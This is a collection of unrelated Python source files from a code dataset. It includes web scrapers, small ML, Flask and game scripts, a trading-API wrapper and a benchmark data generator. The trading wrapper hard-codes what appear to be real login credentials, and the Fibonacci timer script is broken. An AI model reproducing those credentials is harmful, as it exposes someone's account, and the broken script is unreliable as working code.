results)\n","repo_name":"amitab/master_thesis","sub_path":"src/ensembles/rnd_init/resnet_28_2.py","file_name":"resnet_28_2.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"22366957147","text":"#!/opt/anaconda3/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom cgitb import html\nfrom common import *\n\nimport traceback\nfrom urllib import request\nfrom bs4 import BeautifulSoup\nimport os\n\n\nmathjax_script = ''''''\n\n\ndef fetch_en(id):\n en_prob_addr = f'https://projecteuler.net/problem={id}'\n rsp = request.urlopen(en_prob_addr)\n assert rsp.getcode() == 200\n raw = rsp.read()\n soup = BeautifulSoup(raw, 'html.parser')\n res = soup.find(id='content')\n assert res != None\n prob_desc = res.find(class_='problem_content')\n prob_name = res.find('h2')\n html_part = f'

原始项目

' + \\\n str(prob_name) + str(prob_desc) + '
'\n return html_part\n\n\ndef fetch_cn(id):\n cn_prob_addr = f'http://pe-cn.github.io/{id}/'\n rsp = request.urlopen(cn_prob_addr)\n assert rsp.getcode() == 200\n raw = rsp.read()\n soup = BeautifulSoup(raw, 'html.parser')\n res = soup.find(class_='post-body')\n assert res != None\n title = res.find('h1')\n if title != None:\n title.extract()\n bar = res.find('hr')\n if bar != None:\n bar.extract()\n bar = res.find('hr')\n if bar != None:\n bar.extract()\n\n html_part = f'

中文翻译站

' + str(res)\n return html_part\n\n\ndef fetch_oj(id):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36'}\n oj_prob_addr = 'https://www.hackerrank.com/contests/projecteuler/challenges/euler{:03d}/problem'.format(\n int(id))\n req = request.Request(oj_prob_addr, headers=headers)\n rsp = request.urlopen(req)\n assert rsp.getcode() == 200\n raw = rsp.read()\n soup = BeautifulSoup(raw, 'html.parser')\n res = soup.find(class_='challenge-body-html')\n assert res != None\n sub = res.find('sub')\n if sub != None:\n sub.extract()\n html_part = f'

HackerRank

' + \\\n str(res) + '
'\n return html_part\n\n\ndef main():\n id, dir = arg_id_dir()\n part_orginal = fetch_en(id)\n part_translate = fetch_cn(id)\n part_online_judge = fetch_oj(id)\n generate_html(id, dir, part_orginal, part_translate, part_online_judge)\n\n\ndef generate_html(id, dir, *args):\n parent = f'{os.path.join(dir,id)}'\n if not os.path.exists(parent):\n os.mkdir(parent)\n with open(f'{parent}/{id}.html', 'w') as f:\n f.write('''''')\n f.write('''''')\n for arg in args:\n f.write(arg)\n f.write(mathjax_script)\n f.write('''''')\n f.write('''''')\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n cprint('\\nStopped', red)\n except Exception as e:\n cprint('\\nError', red)\n traceback.print_exc()\n","repo_name":"zhangtianxiang/project_euler","sub_path":"fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"44399364436","text":"from time import perf_counter\n\nfor i in range(36):\n\tx=0\n\tstart_time=time.perf_counter()\n\tfor j in range(10):\n\t\tx+=fib(i)\n\tduration = (time.perf_counter()-start_time)/10\n\tprint(\"{:12.10f}\".format(duration))\n\ndef fib(n):\n\thi=1\n\tlo=0\n\tfor i in n:\n\t\ttemp=hi\n\t\thi=hi+lo\n\t\tlo=temp\n\treturn lo\n\ndef rec_fib(n):\n\tif n<2:\n\t\treturn n\n\telse:\n\t\treturn rec_fib(value-1)+rec_fib(value-2)\n","repo_name":"jimmychen9120/cosc3100-algorithms-sp21","sub_path":"fibTimer_v2.py","file_name":"fibTimer_v2.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"2307089093","text":"# 2019\n# author: yuxuan\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\n\nclass MyAdaBoostClassifier(object):\n def __init__(self):\n self._model = None\n\n def train_model(self, x, y):\n X_train, X_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=42)\n clf = AdaBoostClassifier(\n DecisionTreeClassifier(random_state=42, max_depth=2),\n n_estimators=5, random_state=42, algorithm='SAMME')\n clf = clf.fit(X_train, y_train)\n predict = clf.predict(X_train)\n accuracy = accuracy_score(y_train, predict)\n print(\"Boosted DT training accuracy: \" + \"{0:.2f}\".format(accuracy))\n predict = clf.predict(X_test)\n accuracy = accuracy_score(y_test, predict)\n print(\"Boosted DT test accuracy: \" + \"{0:.2f}\".format(accuracy))\n self._model = clf\n\n def predict(self, x):\n return self._model.predict(x)\n\n\nif __name__ == '__main__':\n df = pd.read_csv('up_down.csv')\n y_col = df.columns[-1]\n y = df.pop(y_col)\n clf = MyAdaBoostClassifier()\n clf.train_model(df, y)\n","repo_name":"pyx1992/hftml","sub_path":"model/ada_boost_classifier.py","file_name":"ada_boost_classifier.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29791674565","text":"from flask import Flask, request,jsonify\nimport requests\nimport time\n\napp = Flask(__name__)\nstart_time = None\n\n@app.route('/strategy', methods=['POST'])\ndef strategy():\n global start_time\n start_time = time.time()\n requests.get('http://10.251.64.98:4000/api/clear_logs')\n requests.post('http://10.251.64.98:4000/api/strategy', data={\"id\":\"123456\"})\n return f'Enviado para execução, configra o log em /stragey_log '\n\n@app.route('/strategy_log', methods=['GET'])\ndef strategy_log():\n logs = requests.get('http://10.251.64.98:4000/api/logs')\n return f'Logs: {logs.text}'\n\n\n@app.route('/strategy2', methods=['POST'])\ndef strategy2():\n global start_time\n start_time = time.time()\n response=requests.post('http://10.251.64.98:4000/api/strategy2', data={\"id\":\"123456\"})\n end_time = time.time()\n elapsed_time = end_time - start_time\n return f'Tempo de execução: {elapsed_time} seconds, {response.text}'\n\n\n@app.route('/strategy3', methods=['POST'])\ndef strategy3():\n global start_time\n start_time = time.time()\n requests.get('http://10.251.64.98:4000/api/clear_logs')\n requests.post('http://10.251.64.98:4000/api/strategy', data={\"id\":\"123456\"})\n return f'Strategy started ...'\n\n@app.route('/event', methods=['POST'])\ndef event():\n global start_time\n response=request.get_json()\n end_time = time.time()\n elapsed_time = end_time - start_time\n return f'Tempo de execução: {elapsed_time} seconds, {response}'\n\n@app.route('/health', methods=['GET'])\ndef health():\n return \"Api is working\"\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","repo_name":"andreysantos1/teste-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"18514390211","text":"secret_message = input()\ncount_of_groups = int(input())\na = [\"\" for i in range(count_of_groups)]\n\nfor i in range(count_of_groups):\n #print(\"group {}:\".format(i+1), end = \" \") the second way to solve\n for j in range(i, len(secret_message), count_of_groups):\n a[i] += secret_message[j]\n #print(secret_message[j], end = \" \") the second way to solve\n print(\"group {}:\".format(i+1), a[i])\n\n\n\n#decoder\nmax = 0\ndo_readable = \"\"\nfor i in range(len(a)):\n do_readable += a[i]\n if len(a[i]) > max:\n max = len(a[i])\nfor i in range(max):\n for j in range(count_of_groups):\n if i < len(a[j]):\n print(a[j][i], end = \"\")\n#done","repo_name":"AdilAlimgozha/Python-II","sub_path":"hw1/secret_word.py","file_name":"secret_word.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15874924599","text":"from PIL import Image\nimport os.path\nimport glob\n\n\ndef convertjpg(jpgfile, outdir, width=100, height=100):\n \"\"\"\n # jpg图片更改尺寸后保存到outdir目录下\n :param jpgfile:\n :param outdir: 输出目录\n :param width:输出图片宽度\n :param height:输出图片高度\n :return:None\n \"\"\"\n img = Image.open(jpgfile)\n try:\n new_img = img.resize((width, height), Image.ANTIALIAS)\n new_img.save(os.path.join(outdir, os.path.basename(jpgfile)))\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n path = 'E:/ProgrammeCode/IDEA/PV_Panel_Classify'\n for jpg_file in glob.glob(path+\"/0510/N/*.jpg\"):\n convertjpg(jpg_file, path+\"/0510_resize/N\")\n for jpg_file in glob.glob(path+\"/0510/P/*.jpg\"):\n convertjpg(jpg_file, path+\"/0510_resize/P\")\n","repo_name":"fenghuayangyi/PV_Panel_Classify","sub_path":"resize_photoes.py","file_name":"resize_photoes.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"94"} +{"seq_id":"30413925241","text":"import os\n#identify the directory you are working in\nmydir = \"/Users/QuinnThomas/Desktop/BIOI_Ros/\"\n#save input file to variable #rstrip removes the new line character from the input file\ninfile = open( mydir + \"rosalind_revc.txt\").read().rstrip()\n#create the output file\noutfile = open(mydir + 'rosOut_8.txt', 'w')\n\n#print(infile) #debug tester\n\n#create a dictionary with the DNA complements\nDNA_dict = {\n 'A' : 'T',\n 'T' : 'A',\n 'G' : 'C',\n 'C' : 'G'}\n\nrev_comp = \"\"\n\n#create a for loop that goes through to iterate through each letter of the DNA strand\nfor i in infile:\n #save the complements of this strand in reverse order to get the reverse complement\n rev_comp = DNA_dict[i] + rev_comp \n#write the reverse complement strand to the output file\noutfile.write(rev_comp)\noutfile.close()\n\n\n\n","repo_name":"qthomas612/RosalindProblems","sub_path":"BIOI_Class1/Ros8.py","file_name":"Ros8.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"13366015345","text":"import socket\nimport sys\nimport time\n\nserver = socket.socket()\nhost = input(str(\"Please enter the host name: \"))\nport = 4321\nserver.connect((host,port))\nprint(\"Connected to server\")\nprint(\"Let him send the message first please don't do anything...\")\nwhile True:\n incoming_message = server.recv(1024)\n incoming_message = incoming_message.decode()\n print(\"Server =>> \", incoming_message)\n print(\"He/She is waiting for your message...\")\n message = input(\"You =>> \")\n message = message.encode()\n server.send(message)\n print(\"Wait for his/her message...\")\n","repo_name":"Sahil-Rajwar-2004/Projects","sub_path":"Chat CLIENT.py","file_name":"Chat CLIENT.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"369944826","text":"from Components.Frame import Frame\nfrom Components.Ball import Ball\nfrom Components.Bar import Bar\nfrom Components.Bricks import Bricks\nfrom Components.Powerups import Powerups\nfrom Components.Powerup import Powerup\n\nfrom config import POWERUPS, POWERUP_PROBABILITY, SCREEN_WIDTH, SCREEN_HEIGHT\nimport random\n\nclass Game():\n def __init__(self):\n self.frame = Frame()\n self.bar = Bar()\n self.balls = [Ball(game_init=True)]\n self.bricks = Bricks()\n self.powerups = Powerups()\n self.sticky_balls = [self.balls[0]]\n\n # variables needed for external use\n self.lives = 3\n self.score = 0\n self.quit = False\n\n # YEETS everything from the screen\n def cleanup(self):\n for ball in self.balls:\n ball.draw(True)\n for brick in self.bricks.bricks:\n brick.draw(True)\n for powerup in self.powerups.powerups:\n powerup.draw(True)\n self.bar.draw(True)\n\n # checks for winning condition\n def check_win(self):\n through = False\n for ball in self.balls:\n if ball.through:\n through = True\n break\n if through:\n self.quit = not len(self.bricks.bricks)\n\n flag = True\n for brick in self.bricks.bricks:\n if brick.strength != 4:\n flag = False\n break\n \n if flag:\n self.quit = True\n\n # handles all kinds of inputs\n def handle_input(self, c):\n if not c:\n return\n c = c.lower()\n if c == 'q':\n self.quit = True\n elif c == 'a':\n self.bar.draw(True)\n if self.bar.move(True):\n for ball in self.sticky_balls:\n ball.draw(True)\n ball.move(self.bar, True)\n ball.draw()\n elif c == 'd':\n self.bar.draw(True)\n if self.bar.move(False):\n for ball in self.sticky_balls:\n ball.draw(True)\n ball.move(self.bar, False)\n ball.draw()\n elif c == 'w':\n for ball in self.sticky_balls:\n # resetting for all the balls\n ball.sticky = False\n if ball.saved_velocity:\n ball.velocity = ball.saved_velocity\n ball.saved_velocity = None\n self.sticky_balls = []\n elif c == 'i':\n for ball in self.balls:\n ball.velocity = (0, -1)\n elif c == 'k':\n for ball in self.balls:\n ball.velocity = (0, 1)\n elif c == 'l':\n for ball in self.balls:\n ball.velocity = (1, 0)\n elif c == 'j':\n for ball in self.balls:\n ball.velocity = (-1, 0)\n elif c == ':':\n if self.handle_cheats(input(\"Enter cheat: \")):\n print(\"WRONG = YEET\")\n exit()\n # resets the game after all balls are lost\n def reset(self):\n # reducing lives\n self.lives -= 1\n if self.lives <= 0:\n self.quit = True\n return\n # a new hope\n else:\n x1, y1 = self.bar.start\n x2, _ = self.bar.end\n self.balls.append(Ball(((x1+x2)//2, y1-2)))\n \n # yeets balls which die\n def yeet_points(self):\n newballs = []\n for ball in self.balls:\n if ball.over:\n # shows graves of the balls\n # ball.draw(True)\n del ball\n else:\n newballs.append(ball)\n self.balls = newballs\n\n new_powerups = []\n for powerup in self.powerups.powerups:\n if powerup.over:\n powerup.draw(True)\n del powerup\n else:\n new_powerups.append(powerup)\n self.powerups.powerups = new_powerups\n\n def yeet_bricks(self):\n new_bricks = []\n for brick in self.bricks.bricks:\n if brick.yeet:\n brick.draw(True)\n self.score += 5\n \n symbol = random.choice(POWERUPS)\n x1, y1 = brick.start\n x2, y2 = brick.end\n\n if random.random() < POWERUP_PROBABILITY:\n self.powerups.powerups.append(\n Powerup(\n symbol=symbol,\n position=((x1+x2)//2, y1)\n )\n )\n \n del brick\n else:\n brick.draw()\n new_bricks.append(brick)\n self.bricks.bricks = new_bricks\n\n # handles all the moving objects\n def handle_movements(self):\n # moves the balls\n for ball in self.balls:\n if not ball.saved_velocity:\n ball.draw(True)\n ball.move()\n \n # moves the powerups\n for powerup in self.powerups.powerups:\n powerup.draw(True)\n powerup.move()\n\n # returns true if nothing matches\n def handle_cheats(self, c):\n if c == 'G':\n self.bar.grow()\n elif c == 'S':\n self.bar.shrink()\n elif c == 'T':\n for ball in self.balls:\n ball.through = True\n elif c == 'F':\n for ball in self.balls:\n ball.fast()\n elif c == 'B':\n new_balls = []\n for ball in self.balls:\n xv, yv = ball.velocity\n new_balls.append(\n Ball(\n ball.position, \n velocity=(-xv, -yv)\n )\n )\n self.balls.extend(new_balls)\n elif c == 'K':\n for ball in self.balls:\n ball.sticky = True\n else:\n return True\n\n # handles all the collisions\n def handle_collisions(self):\n # ball related collisions\n for ball in self.balls:\n saved_velocity = self.bar.handle_collided(ball)\n # only saved when sticky, since otherwise its None\n if saved_velocity: \n ball.saved_velocity = saved_velocity\n # print(ball.saved_velocity)\n self.sticky_balls.append(ball)\n\n self.frame.handle_collided(ball)\n self.bricks.handle_collided(ball)\n \n # moves the powerups\n for powerup in self.powerups.powerups:\n # yeets if out of bar bound\n self.frame.handle_collided(powerup, reflect=False)\n # checks if the powerup is absorbed\n is_absorbed = self.bar.handle_collided(powerup)\n if is_absorbed:\n powerup.over = True\n self.handle_cheats(powerup.symbol)\n\n def render(self):\n # checks if the game has been won or not\n self.check_win()\n\n # yeets balls & powerups which die\n self.yeet_points()\n # yeets bricks which die\n self.yeet_bricks()\n\n # CHECKING NEW BALL/GAME OVER CONDITION\n if not len(self.balls):\n self.reset()\n \n # MOVING OBJECTS\n self.handle_movements()\n \n # COLLIDING THE OBJECTS\n self.handle_collisions()\n\n # DRAW THE SHAPES\n # self.frame.draw()\n self.bar.draw()\n for ball in self.balls:\n ball.draw()\n self.bricks.draw()\n self.powerups.draw()\n","repo_name":"chaudhary1337/Dx-Ball-Ripoff","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":7535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"37714230287","text":"from collections import deque, defaultdict\nfrom datetime import datetime as dt\nimport functools\nimport os\nimport time\nimport signal\n\nimport pandas as pd\nimport numpy as np\n\n#import pandas as pd\nfrom PyQt5.QAxContainer import QAxWidget\nfrom PyQt5.QtCore import QEventLoop, QTimer\nfrom PyQt5.QtWidgets import QMainWindow\n\nfrom _logger import Logger\nimport errors \n\nclass SHIndi(QMainWindow):\n\n __instance = None\n \n @classmethod\n def __getInstance(cls):\n return cls.__instance\n\n @classmethod \n def instance(cls, *args, **kwargs):\n cls.__instance = cls(*args, **kwargs)\n cls.instance = cls.__getInstance\n return cls.__instance\n\n\n def __init__(self):\n super().__init__()\n\n self.IndiTR = QAxWidget(\"GIEXPERTCONTROL.GiExpertControlCtrl.1\")\n self.IndiTR.ReceiveData.connect(self.OnReceiveData)\n self.IndiTR.ReceiveSysMsg.connect(self.OnReceiveSysMsg)\n\n self.IndiReal = QAxWidget(\"GIEXPERTCONTROL.GiExpertControlCtrl.1\")\n self.IndiReal.ReceiveRTData.connect(self.OnReceiveRealData)\n\n # Loop 변수 : 비동기 방식으로 동작되는 이벤트를 동기화 \n self.logingLoop = None\n self.requestLoop = None\n self.orderLoop = None\n self.conditionLoop = None\n\n # 서버구분 \n self.serverStatus = None\n\n # 연속조회 구분 \n self.isNext = 0\n self.rqidD = {}\n\n # logging \n self.homepath = os.environ.get(\"userprofile\")\n self.logger = Logger(path=self.log_path, name=\"SH Indi\")\n\n # 메세지 처리 \n self.msg = \"\"\n\n\n ##----------------------------------------------------------------------------------------------------------------------\n ## Function method block \n ##----------------------------------------------------------------------------------------------------------------------\n\n @property\n def log_path(self):\n path = os.path.join(self.homepath, 'log')\n if not os.path.exists(path):\n os.mkdir(path)\n \n return path\n \n\n def connect(self):\n\n while True:\n blogin = self.IndiTR.StartIndi('biyawara', 'koscom@1', 'choi9880@1', 'C:\\SHINHAN-i\\Indi GX\\giexpertstarter.exe')\n \n if blogin == True :\n self.logger.info(\"정상 접속 하였습니다\") \n break\n\n \n def setQueryName(self, value):\n self.IndiTR.dynamicCall(\"SetQueryName(QString)\",value)\n \n\n # TRCODE에 맞는 값을 설정한다. \n def setInputValue(self, index, key, value):\n \"\"\" TR 전송에 필요한 값을 설정한다.\n\n Parameters\n ----------\n key: str\n TR에 명시된 input 이름, ex) 계좌번호, 종목코드\n value: str\n key에 해당하는 값, ex) 88231524, 005930\n \"\"\"\n \n if not isinstance(key, str):\n key = str(key)\n\n if not isinstance(value, str):\n value = str(value)\n\n self.IndiTR.dynamicCall(\"SetSingleData(int, QString)\", index, value)\n\n\n def commRqData(self, query_name, inquire):\n returnCode = self.IndiTR.dynamicCall(\"RequestData()\")\n if returnCode <= 0: # 0이외엔 실패\n self.logger.error(\n \"commRqData {} Request Failed!\".format(query_name)\n )\n raise errors.ProcessingError()\n\n self.rqidD[returnCode] = query_name\n\n # 루프 생성: eventReceiveTrData() 메서드에서 루프를 종료시킨다.\n self.logger.debug(\"{} commRqData {}\".format(dt.now(), query_name))\n self.requestLoop = QEventLoop()\n self.requestLoop.exec_()\n\n\n ##----------------------------------------------------------------------------------------------------------------------\n ## Async Event Processing block\n ##----------------------------------------------------------------------------------------------------------------------\n def OnReceiveData(self, rqid):\n \n queryname = self.rqidD[rqid]\n print(queryname)\n\n # 해외 호가의 경우 \n if queryname == \"RH\":\n data = \"TEST\" #<-- 이곳에서 데이터 파징\n elif queryname == \"FRF_MST\":\n self.TR_FRF_MST() \n data = \"TEST\" #<-- 이곳에서 데이터 파징\n\n\n setattr(self, queryname, data)\n\n # EXIT LOOP \n try:\n self.requestLoop.exit()\n except AttributeError:\n pass \n\n\n # system event로 보임 \n def OnReceiveSysMsg(self, msgID):\n print(msgID)\n\n\n # 실시간 데이터\n def OnReceiveRealData(self, realId) :\n print(realId)\n\n\n ##----------------------------------------------------------------------------------------------------------------------\n ## TR 처리 구문 \n ##---------------------------------------------------------------------------------------------------------------------- \n \n # FRF_MST // 선물 마스터 \n def TR_FRF_MST(self):\n \n nCnt = self.IndiTR.dynamicCall(\"GetMultiRowCount()\")\n\n for i in range(0, nCnt):\n code = self.IndiTR.dynamicCall(\"GetMultiData(int, int)\", i, 0)\n name = self.IndiTR.dynamicCall(\"GetMultiData(int, int)\", i, 0)\n exchange_code = self.IndiTR.dynamicCall(\"GetMultiData(int, int)\", i, 0)\n price_point = self.IndiTR.dynamicCall(\"GetMultiData(int, int)\", i, 0)\n ns = self.IndiTR.dynamicCall(\"GetMultiData(int, int)\", i, 0)\n qte_unit = self.IndiTR.dynamicCall(\"GetMultiData(int, int)\", i, 0)\n \n","repo_name":"biyawara/shinhanindi","sub_path":"SHIndi.py","file_name":"SHIndi.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"43352298131","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 30 14:17:36 2020\r\n\r\n@author: PREET MODH\r\n\"\"\"\r\n\r\n\r\ns=list(input())\r\nt=list(input())\r\ns.reverse()\r\nt.reverse()\r\nans=0\r\nif s[0]!=t[0]:\r\n ans=len(s) + len(t)\r\nelse:\r\n cnt=0\r\n for i in range(min(len(s),len(t))):\r\n if s[i]==t[i]:\r\n cnt+=1\r\n else:\r\n break\r\n ans=(len(s) - cnt) + (len(t) - cnt)\r\nprint(ans)\r\n","repo_name":"preetmodh/COMPETETIVE_CODING_QUESTIONS","sub_path":"CODEFORCES/Delete from the Left.py","file_name":"Delete from the Left.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"7688947806","text":"#!env python3\n\nimport itertools\nimport math\nimport multiprocessing\nimport numpy\nimport os\nimport random\nimport string\n\n\nNUM_TUPLES = 10_000_000\nSTRLEN = 10\nOUTPUT_DIR = os.path.join('benchmark', 'operators', 'data')\nNUM_DISTINCT_VALUES = NUM_TUPLES // 10\nFKEY_JOIN_SELECTIVITY = 1e-8\nN_M_JOIN_SELECTIVITY = 1e-6\n\nTYPE_TO_STR = {\n 'b': 'BOOL',\n 'i8': 'INT(1)',\n 'i16': 'INT(2)',\n 'i32': 'INT(4)',\n 'i64': 'INT(8)',\n 'f': 'FLOAT',\n 'd': 'DOUBLE',\n}\n\nSCHEMA = {\n \"Attribute_b\": [\n ( 'id', 'i32' ),\n ( 'val', 'b' ),\n ],\n\n \"Attribute_i8\": [\n ( 'id', 'i32' ),\n ( 'val', 'i8' ),\n ],\n\n \"Attribute_i16\": [\n ( 'id', 'i32' ),\n ( 'val', 'i16' ),\n ],\n\n \"Attribute_i32\": [\n ( 'id', 'i32' ),\n ( 'val', 'i32' ),\n ],\n\n \"Attribute_i64\": [\n ( 'id', 'i32' ),\n ( 'val', 'i64' ),\n ],\n\n \"Attribute_f\": [\n ( 'id', 'i32' ),\n ( 'val', 'f' ),\n ],\n\n \"Attribute_d\": [\n ( 'id', 'i32' ),\n ( 'val', 'd' ),\n ],\n\n \"Distinct_i32\": [\n ( 'id', 'i32' ),\n ( 'n1', 'i32', 1 ),\n ( 'n10', 'i32', 10 ),\n ( 'n100', 'i32', 100 ),\n ( 'n1000', 'i32', 1000 ),\n ( 'n10000', 'i32', 10000 ),\n ( 'n100000', 'i32', 100000 ),\n ],\n\n \"Relation\": [\n ( 'id', 'i32' ),\n ( 'fid', 'i32' ),\n ( 'n2m', 'i32' ),\n ],\n\n \"Attributes_multi_b\": [\n ( 'id', 'i32' ),\n ( 'a0', 'b' ),\n ( 'a1', 'b' ),\n ( 'a2', 'b' ),\n ( 'a3', 'b' ),\n ],\n\n \"Attributes_multi_i32\": [\n ( 'id', 'i32' ),\n ( 'a0', 'i32' ),\n ( 'a1', 'i32' ),\n ( 'a2', 'i32' ),\n ( 'a3', 'i32' ),\n ],\n\n \"Attributes_multi_i64\": [\n ( 'id', 'i32' ),\n ( 'a0', 'i64' ),\n ( 'a1', 'i64' ),\n ( 'a2', 'i64' ),\n ( 'a3', 'i64' ),\n ],\n\n \"Attributes_multi_f\": [\n ( 'id', 'i32' ),\n ( 'a0', 'f' ),\n ( 'a1', 'f' ),\n ( 'a2', 'f' ),\n ( 'a3', 'f' ),\n ],\n\n \"Attributes_multi_d\": [\n ( 'id', 'i32' ),\n ( 'a0', 'd' ),\n ( 'a1', 'd' ),\n ( 'a2', 'd' ),\n ( 'a3', 'd' ),\n ],\n}\n\n\n#=======================================================================================================================\n# Helper Functions\n#=======================================================================================================================\n\n# Process an `iterable` in groups of size `n`\ndef grouper(iterable, n):\n it = iter(iterable)\n while True:\n chunk_it = itertools.islice(it, n)\n try:\n first_el = next(chunk_it)\n except StopIteration:\n return\n yield itertools.chain((first_el,), chunk_it)\n\n# Generate `num` distinct integer values, drawn uniformly at random from the range [ `smallest`, `largest` ).\ndef gen_random_int_values(smallest :int, largest :int, num :int):\n assert largest - smallest >= num\n\n if largest - smallest == num:\n return list(range(smallest, largest))\n\n taken = set()\n counter = largest - num\n values = list()\n\n for i in range(0, num):\n val = random.randrange(smallest, largest - num)\n if val in taken:\n values.append(counter)\n counter += 1\n else:\n taken.add(val)\n values.append(val)\n\n assert len(values) == len(set(values))\n return values\n\n\n#=======================================================================================================================\n# Data Generation\n#=======================================================================================================================\n\ndef gen_database(name, schema, path_to_dir):\n with open(os.path.join(path_to_dir, 'schema.sql'), 'w') as sql:\n sql.write(f'''\\\nCREATE DATABASE {name};\nUSE {name};\n''')\n\n for table_name, attributes in schema.items():\n sql.write(f'''\nCREATE TABLE {table_name}\n(\n''')\n attrs = list()\n for attr in attributes:\n attrs.append(f' {attr[0]} {TYPE_TO_STR[attr[1]]} NOT NULL')\n sql.write(',\\n'.join(attrs))\n\n path_to_csv = os.path.join(path_to_dir, f'{table_name}.csv')\n sql.write(f'''\n);\n'''\n)\n\ndef gen_column(attr, num_tuples):\n name = attr[0]\n ty = attr[1]\n num_distinct_values = attr[2] if len(attr) >= 3 else NUM_DISTINCT_VALUES\n random.seed(hash(name))\n\n if 'fid' in name:\n num_fids_joining = min(int(FKEY_JOIN_SELECTIVITY * num_tuples * num_tuples), num_tuples)\n foreign_keys = [ random.randrange(0, num_tuples) for i in range(num_fids_joining) ]\n foreign_keys.extend([num_tuples] * (num_tuples - num_fids_joining))\n assert len(foreign_keys) == num_tuples\n random.shuffle(foreign_keys)\n print(f' + Generated column {name} of {num_tuples:,} rows with {num_fids_joining:,} foreign keys with a join partner.')\n return map(str, foreign_keys)\n elif 'id' in name:\n print(f' + Generated column {name} of {num_tuples:,} rows with keys from 0 to {num_tuples-1:,}.')\n return map(str, range(num_tuples))\n elif 'n2m' in name: # n to m join\n num_distinct_values = int(round(1 / N_M_JOIN_SELECTIVITY))\n values = gen_random_int_values(-2**31 + 1, 2**31, num_distinct_values)\n elif ty == 'b':\n values = [ 'TRUE', 'FALSE' ]\n elif ty == 'f' or ty == 'd':\n values = [ random.random() for i in range(num_distinct_values) ]\n elif ty == 'i8':\n values = gen_random_int_values( -2**7 + 1, 2**7, min( 2**8 - 1, num_distinct_values))\n elif ty == 'i16':\n values = gen_random_int_values(-2**15 + 1, 2**15, min(2**16 - 1, num_distinct_values))\n elif ty == 'i32':\n values = gen_random_int_values(-2**31 + 1, 2**31, min(2**32 - 1, num_distinct_values))\n elif ty == 'i64':\n values = gen_random_int_values(-2**63 + 1, 2**63, min(2**64 - 1, num_distinct_values))\n else:\n raise Exception('unsupported type')\n\n data = list(itertools.chain.from_iterable(itertools.repeat(values, math.ceil(num_tuples / len(values)))))[0:num_tuples]\n print(f' + Generated column {name} of {len(data):,} rows with {len(set(data)):,} distinct values.')\n random.shuffle(data)\n return map(str, data)\n\ndef gen_table(table_name, attributes, path_to_dir):\n print(f'Generating data for table {table_name}')\n with multiprocessing.Pool(multiprocessing.cpu_count()) as pool:\n path = os.path.join(path_to_dir, table_name + '.csv')\n columns = pool.starmap(gen_column, zip(attributes, [NUM_TUPLES] * len(attributes)))\n\n with open(path, 'w') as csv:\n # write header\n csv.write(','.join(map(lambda attr: attr[0], attributes)) + '\\n')\n rows = map(','.join, zip(*columns))\n for g in grouper(rows, 1000):\n csv.write('\\n'.join(g))\n csv.write('\\n')\n\ndef gen_tables(schema, path_to_dir):\n for table_name, attributes in schema.items():\n gen_table(table_name, attributes, path_to_dir)\n\nif __name__ == '__main__':\n print(f'Generating data in {OUTPUT_DIR}')\n os.makedirs(OUTPUT_DIR, exist_ok=True)\n gen_database('operators', SCHEMA, OUTPUT_DIR)\n gen_tables(SCHEMA, OUTPUT_DIR)\n","repo_name":"mutable-org/mutable","sub_path":"benchmark/operators/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":7356,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"94"} +{"seq_id":"23517655705","text":"import datetime\nimport pyttsx3\nimport file_open\nimport cloak\nimport web\nimport random\nimport os\nfrom engine2 import speak\nimport speech_recognition as sr\nfrom user_cred1 import SignUp\n\n\ndef Greetings():\n\n time = int(datetime.datetime.now().hour)\n if time >= 12 and time < 16:\n speak(\"Good Afternoon Sir\")\n elif time >= 0 and time < 12:\n speak(\"Good Morning Sir\")\n else:\n speak(\"Good Evening Sir\")\n\n speak(\"I am Avatar, always at your service.\")\n\n\ndef takecommand():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Lisening...\")\n r.pause_threshold = 1\n audio = r.listen(source)\n\n try:\n print(\"Recognizing...\")\n query = r.recognize_google(audio, language='en-in')\n print(f\"Boss: {query}\\n\")\n\n except Exception as 